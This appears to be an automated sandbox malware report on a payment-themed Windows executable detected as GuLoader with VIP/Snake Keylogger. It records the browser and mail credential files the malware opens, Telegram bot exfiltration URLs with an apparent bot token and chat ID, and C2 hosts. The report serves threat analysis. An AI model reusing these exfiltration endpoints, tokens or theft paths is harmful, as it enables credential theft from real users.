            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7

            Stealing of Sensitive Information

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8012, type: MEMORYSTR
            Yara detected VIP Keylogger
            Source: Yara matchFile source: 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: Yara matchFile source: 00000006.00000002.2936459320.0000000021B7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8012, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8012, type: MEMORYSTR
            Yara detected VIP Keylogger
            Source: Yara matchFile source: 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		2
            Obfuscated Files or Information            		1
            OS Credential Dumping            		2
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		1
            Web Service            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            PowerShell            		1
            Registry Run Keys / Startup Folder            		1
            Access Token Manipulation            		1
            Software Packing            		LSASS Memory14
            System Information Discovery            		Remote Desktop Protocol1
            Data from Local System            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
            Process Injection            		1
            DLL Side-Loading            		Security Account Manager11
            Security Software Discovery            		SMB/Windows Admin Shares1
            Email Collection            		21
            Encrypted Channel            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            Registry Run Keys / Startup Folder            		11
            Masquerading            		NTDS1
            Process Discovery            		Distributed Component Object Model1
            Clipboard Data            		4
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script31
            Virtualization/Sandbox Evasion            		LSA Secrets31
            Virtualization/Sandbox Evasion            		SSHKeylogging15
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Access Token Manipulation            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
            Process Injection            		DCSync1
            System Network Configuration Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576296 Sample: Justificante pago-094532564... Startdate: 16/12/2024 Architecture: WINDOWS Score: 100 34 reallyfreegeoip.org 2->34 36 api.telegram.org 2->36 38 4 other IPs or domains 2->38 44 Found malware configuration 2->44 46 Yara detected VIP Keylogger 2->46 48 Yara detected GuLoader 2->48 54 5 other signatures 2->54 8 Justificante pago-09453256434687.exe 1 33 2->8         started        signatures3 50 Tries to detect the country of the analysis system (by using the IP) 34->50 52 Uses the Telegram API (likely for C&C communication) 36->52 process4 file5 22 C:\Users\user\...\Forhaandsudtalelses.Pot162, Unicode 8->22 dropped 24 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->24 dropped 56 Suspicious powershell command line found 8->56 12 powershell.exe 30 8->12         started        signatures6 process7 file8 26 C:\...\Justificante pago-09453256434687.exe, PE32 12->26 dropped 58 Early bird code injection technique detected 12->58 60 Writes to foreign memory regions 12->60 62 Found suspicious powershell code related to unpacking or dynamic code loading 12->62 64 3 other signatures 12->64 16 msiexec.exe 15 8 12->16         started        20 conhost.exe 12->20         started        signatures9 process10 dnsIp11 28 api.telegram.org 149.154.167.220, 443, 49806, 49825 TELEGRAMRU United Kingdom 16->28 30 checkip.dyndns.com 158.101.44.242, 49738, 49742, 49750 ORACLE-BMC-31898US United States 16->30 32 3 other IPs or domains 16->32 40 Tries to steal Mail credentials (via file / registry access) 16->40 42 Tries to harvest and steal browser information (history, passwords, etc) 16->42 signatures12

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Justificante pago-09453256434687.exe8%ReversingLabs

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes\Justificante pago-09453256434687.exe8%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsj887A.tmp\nsExec.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            		172.217.19.174
            		truefalse
              		high
              drive.usercontent.google.com
              		142.250.181.1
              		truefalse
                		high
                reallyfreegeoip.org
                		104.21.67.152
                		truefalse
                  		high
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high
                    checkip.dyndns.com
                    		158.101.44.242
                    		truefalse
                      		high
                      checkip.dyndns.org
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:065367%0D%0ADate%20and%20Time:%2017/12/2024%20/%2019:35:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20065367%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                          		high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            		high
                            http://checkip.dyndns.org/false
                              		high
                              https://api.telegram.org/bot7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM/sendDocument?chat_id=5234817354&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                                		high
                                https://api.telegram.org/bot7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM/sendDocument?chat_id=5234817354&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.office.com/msiexec.exe, 00000006.00000002.2936459320.0000000021C66000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B7C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021C57000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2056661315.0000000005A2D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000001.00000002.2053769821.0000000004B16000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://api.telegram.orgmsiexec.exe, 00000006.00000002.2936459320.0000000021C18000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B57000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2053769821.0000000004B16000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.telegram.org/botmsiexec.exe, 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://translate.google.com/translate_a/element.jsmsiexec.exe, 00000006.00000003.2139339110.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2139283272.0000000005F3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.2053769821.0000000004B16000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://crl.microsoftpowershell.exe, 00000001.00000002.2046362099.00000000008F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2053769821.0000000004B16000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:065367%0D%0ADate%20amsiexec.exe, 00000006.00000002.2936459320.0000000021B57000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://contoso.com/Licensepowershell.exe, 00000001.00000002.2056661315.0000000005A2D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.office.com/lBmsiexec.exe, 00000006.00000002.2936459320.0000000021C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://contoso.com/Iconpowershell.exe, 00000001.00000002.2056661315.0000000005A2D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://drive.usercontent.google.com/msiexec.exe, 00000006.00000003.2194212584.0000000005F3A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2924097464.0000000005F36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://checkip.dyndns.orgmsiexec.exe, 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016msiexec.exe, 00000006.00000002.2937418489.0000000022E15000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B7C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B4E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022BC3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022CF2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022D40000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://nsis.sf.net/NSIS_ErrorErrorJustificante pago-09453256434687.exe, Justificante pago-09453256434687.exe.1.drfalse
                                                                      		high
                                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17msiexec.exe, 00000006.00000002.2937418489.0000000022E15000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B7C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B4E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022BC3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022CF2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022D40000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=msiexec.exe, 00000006.00000002.2936459320.0000000021B57000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://chrome.google.com/webstore?hl=enmsiexec.exe, 00000006.00000002.2936459320.0000000021C35000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021C66000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://varders.kozow.com:8081msiexec.exe, 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2053769821.0000000004B16000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://aborters.duckdns.org:8081msiexec.exe, 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.google.commsiexec.exe, 00000006.00000003.2139339110.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2139283272.0000000005F3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://51.38.247.67:8081/_send_.php?Lmsiexec.exe, 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.2053769821.00000000049C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://drive.google.com/msiexec.exe, 00000006.00000002.2924097464.0000000005ECA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://anotherarmy.dns.army:8081msiexec.exe, 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installmsiexec.exe, 00000006.00000002.2937418489.0000000022B29000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022CF8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022DF0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B54000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022CCD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.2053769821.0000000004B16000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://contoso.com/powershell.exe, 00000001.00000002.2056661315.0000000005A2D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2056661315.0000000005A2D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://chrome.google.com/webstore?hl=enlBmsiexec.exe, 00000006.00000002.2936459320.0000000021C30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://reallyfreegeoip.org/xml/8.46.123.189$msiexec.exe, 00000006.00000002.2936459320.0000000021AEA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B57000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://reallyfreegeoip.orgmsiexec.exe, 00000006.00000002.2936459320.0000000021AC0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B57000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://apis.google.commsiexec.exe, 00000006.00000003.2139339110.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2139283272.0000000005F3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesmsiexec.exe, 00000006.00000002.2937418489.0000000022B29000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022CF8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022DF0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B54000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022CCD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://api.telegram.orgmsiexec.exe, 00000006.00000002.2936459320.0000000021C18000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2053769821.00000000049C1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://api.telegram.org/bot7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM/sendDocument?chat_id=5234msiexec.exe, 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://reallyfreegeoip.org/xml/msiexec.exe, 00000006.00000002.2936459320.0000000021AC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high

                                                                                                                      World Map of Contacted IPs

                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs

                                                                                                                      Public IPs

                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      149.154.167.220
                                                                                                                      		api.telegram.orgUnited Kingdom
                                                                                                                      		62041TELEGRAMRUfalse
                                                                                                                      142.250.181.1
                                                                                                                      		drive.usercontent.google.comUnited States
                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                      104.21.67.152
                                                                                                                      		reallyfreegeoip.orgUnited States
                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                      158.101.44.242
                                                                                                                      		checkip.dyndns.comUnited States
                                                                                                                      		31898ORACLE-BMC-31898USfalse
                                                                                                                      172.217.19.174
                                                                                                                      		drive.google.comUnited States
                                                                                                                      		15169GOOGLEUSfalse

                                                                                                                      General Information

                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                      Analysis ID:1576296
                                                                                                                      Start date and time:2024-12-16 18:27:05 +01:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 7m 30s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                      Number of analysed new started processes analysed:8
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:0
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample name:Justificante pago-09453256434687.exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@6/16@5/5
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 66.7%
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 98%
                                                                                                                      • Number of executed functions: 182
